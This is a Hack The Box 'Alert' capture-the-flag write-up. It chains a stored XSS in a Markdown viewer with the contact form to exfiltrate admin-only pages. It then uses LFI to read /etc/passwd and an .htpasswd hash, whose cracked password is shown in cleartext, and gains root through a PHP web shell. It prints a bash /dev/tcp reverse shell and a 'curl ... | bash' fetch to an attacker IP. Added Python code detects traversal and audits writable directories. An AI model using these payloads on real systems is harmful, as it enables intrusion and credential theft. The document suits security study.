> m4rt@CTF_ARCHIVE:~$


Hack The Box / LINUX / 2024-11-30

Hack The Box — Alert (Linux)

Contact form SSRF/XSS chain to exfiltrate internal messages and LFI data, credential recovery from .htpasswd, SSH as albert, and root command execution through a writable website-monitor config directory.

Target

  • IP: 10.129.231.188

Port Scan

sudo nmap -sC -sV 10.129.231.188 -p- -T5 -v
PORT      STATE    SERVICE VERSION
22/tcp    open     ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 7e:46:2c:46:6e:e6:d1:eb:2d:9d:34:25:e6:36:14:a7 (RSA)
|   256 45:7b:20:95:ec:17:c5:b4:d8:86:50:81:e0:8c:e8:b8 (ECDSA)
|_  256 cb:92:ad:6b:fc:c8:8e:5e:9f:8c:a2:69:1b:6d:d0:f7 (ED25519)
80/tcp    open     http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Did not follow redirect to http://alert.htb/
|_http-server-header: Apache/2.4.41 (Ubuntu)
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
12227/tcp filtered unknown
20856/tcp filtered unknown
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Add alert.htb to /etc/hosts.

Go to http://alert.htb.

This is a PHP site that lets you upload and view Markdown files.

Contact Form Behavior and Initial Callback

Go to the Contact us page.

Fill the fields and intercept the request.

A request is made to /contact.php with two parameters:

  • email
  • message

Send the request to Repeater.

Start a Python HTTP server:

python3 -m http.server 80

Modify message with this payload:

http://10.10.16.21/a

Remember to URL-encode it.

In the Python server terminal, we receive a request coming from the target machine.

Endpoint Discovery

ffuf -u 'http://alert.htb/index.php?page=FUZZ' -w /home/kali/SecLists/Discovery/Web-Content/raft-small-words.txt -t 50 -fw 126
contact                 [Status: 200, Size: 1000, Words: 191, Lines: 29, Duration: 143ms]
about                   [Status: 200, Size: 1046, Words: 187, Lines: 24, Duration: 56ms]
messages                [Status: 200, Size: 661, Words: 123, Lines: 25, Duration: 57ms]
donate                  [Status: 200, Size: 1116, Words: 292, Lines: 29, Duration: 50ms]
alert                   [Status: 200, Size: 966, Words: 201, Lines: 29, Duration: 56ms]

If we go to http://alert.htb/index.php?page=messages, we get an empty page.

However, through the contact form we can make the admin visit that page and exfiltrate the response to our server.

Stored XSS for Messages Exfiltration

Start listener:

nc -vlnp 80

Use payload file:

  • attachments/exp_1.html

Upload a Markdown file.

Intercept request with Burp and send it to Repeater.

We see a POST request to /visualizer.php.

Replace the uploaded Markdown content with the content of attachments/exp_1.html.

In the response, copy the uploaded markdown link, for example:

http://alert.htb/visualizer.php?link_share=6745ecd1467b66.27402664.md

Go to the Repeater tab for /contact.php.

Modify message with the copied link and send.

In the netcat terminal we obtain:

<h1>Messages</h1><ul><li><a href='messages.php?file=2024-03-10_15-48-34.txt'>2024-03-10_15-48-34.txt</a></li></ul>

Use payload file:

  • attachments/exp_2.html

Repeat the previous operations with payload in attachments/exp_2.html.

We obtain:

<pre></pre>

The file is empty.

LFI via messages.php file Parameter

Go to the Repeater tab with the request to /visualizer.php.

Set payload:

fetch('http://alert.htb/messages.php?file=../../../../etc/passwd')

Repeat the previous steps.

We obtain /etc/passwd from the target machine.

We note users:

  • albert
  • david

Repeat steps with:

file=../../../../etc/apache2/sites-available/000-default.conf

We note:

    ServerName statistics.alert.htb
    DocumentRoot /var/www/statistics.alert.htb
    AuthUserFile /var/www/statistics.alert.htb/.htpasswd

Repeat steps with:

file=../../../../var/www/statistics.alert.htb/.htpasswd

We obtain:

<pre>albert:$apr1$bMoRBJOg$igG8WBtQ1xYDTQdLjSWZQ/
</pre>

Save the hash to a file named hash and crack it:

hashcat -a 0 ./hash ./rockyou.txt

Recovered password:

  • manchesterunited
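Added defensive example (not part of the original writeup): the LFI above comes from messages.php passing its file parameter straight into the filesystem. The block shows the path check the endpoint should perform, plus a detector that flags traversal attempts against messages.php in Apache access logs. The log lines are constructed for the example, not taken from the target.

```python
import os
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed Apache "combined" log lines modelling the messages.php?file= requests
# from this writeup; the IPs and timestamps are made up.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Mar/2024:15:48:34 +0000] "GET /messages.php?file=2024-03-10_15-48-34.txt HTTP/1.1" 200 661 "-" "Mozilla/5.0"
10.0.0.9 - - [10/Mar/2024:15:50:01 +0000] "GET /messages.php?file=../../../../etc/passwd HTTP/1.1" 200 2412 "-" "Mozilla/5.0"
10.0.0.9 - - [10/Mar/2024:15:50:07 +0000] "GET /messages.php?file=..%2F..%2F..%2F..%2Fvar/www/statistics.alert.htb/.htpasswd HTTP/1.1" 200 80 "-" "Mozilla/5.0"
10.0.0.7 - - [10/Mar/2024:15:51:00 +0000] "GET /index.php?page=about HTTP/1.1" 200 1046 "-" "Mozilla/5.0"
"""

REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

def resolve_message_file(base_dir, user_value):
    """Return the resolved path of a message file inside base_dir, or None when
    the user-supplied value escapes it. This is the check messages.php lacks."""
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, user_value))
    # commonpath fails closed: any '..' that climbs above base is rejected
    if os.path.commonpath([base, candidate]) != base:
        return None
    return candidate

def find_traversal_attempts(log_text):
    """Return (ip, decoded file value, status) for messages.php requests whose
    file parameter contains a parent-directory component after URL decoding."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        url = urlsplit(m.group("target"))
        if url.path != "/messages.php":
            continue
        for value in parse_qs(url.query).get("file", []):
            decoded = unquote(value)  # parse_qs decoded once; catch double encoding
            if ".." in decoded.split("/"):
                hits.append((m.group("ip"), decoded, int(m.group("status"))))
    return hits
```

A 200 status on a flagged request means the file was actually served; those rows are the ones to triage first.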

SSH Access and Local Privilege Escalation

ssh albert@alert.htb

Use the recovered password.

ps aux

We notice:

/usr/bin/php -S 127.0.0.1:8080 -t /opt/website-monitor

ss -ltpn

Port 8080 is open on localhost.

ssh albert@alert.htb -NL 5555:localhost:8080

Go to:

http://localhost:5555/

It seems we cannot exploit anything directly.

Back to shell as albert:

id

We are in the management group.

Inside /opt/website-monitor, members of the management group can write to the config directory, which the PHP built-in server serves.

Go to /opt/website-monitor/config and run:

echo '<?php system($_GET["cmd"]); ?>' > shell.php

Go to:

http://localhost:5555/config/shell.php?cmd=id

We obtain:

uid=0(root) gid=0(root) groups=0(root)

We now have RCE and can get a reverse shell.

Create a file named rev with this content:

bash -i >& /dev/tcp/10.10.16.21/4444 0>&1

Start netcat and Python HTTP server:

nc -vlnp 4444
python3 -m http.server 80

Go to:

http://localhost:5555/config/shell.php?cmd=curl http://10.10.16.21/rev | bash

We obtain a reverse shell as root.
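Added defensive example (not part of the original writeup): the root shell comes from a privileged PHP server serving a tree in which a non-root group can write. The audit below walks a document root and returns every directory a group member or other user could drop a file into; the sample tree it builds is constructed to mirror the writable config directory, not copied from the box.

```python
import os
import stat
import tempfile

def writable_by_non_owner(path):
    """True if group or others have write permission on path (g+w or o+w)."""
    mode = os.stat(path).st_mode
    return bool(mode & (stat.S_IWGRP | stat.S_IWOTH))

def audit_docroot(docroot):
    """Walk a document root served by a privileged process and return the
    directories (relative to docroot) that a non-owner could write into.
    Any hit is a place where a user-controlled .php file would run as the
    server's user, exactly the condition abused above."""
    findings = []
    for dirpath, _dirnames, _files in os.walk(docroot):
        if writable_by_non_owner(dirpath):
            findings.append(os.path.relpath(dirpath, docroot))
    return sorted(findings)

def build_sample_tree():
    """Constructed layout modelling /opt/website-monitor: 'config' is
    group-writable (0775), 'public' is not (0755). Returns the temp root."""
    root = tempfile.mkdtemp(prefix="website-monitor-")
    os.chmod(root, 0o755)
    for name, mode in (("config", 0o775), ("public", 0o755)):
        d = os.path.join(root, name)
        os.mkdir(d)
        os.chmod(d, mode)
    return root

if __name__ == "__main__":
    print(audit_docroot(build_sample_tree()))  # ['config']
```

Run it against the real docroot as root; the fix is to drop the group write bit (or run the monitor as an unprivileged user) until the list is empty.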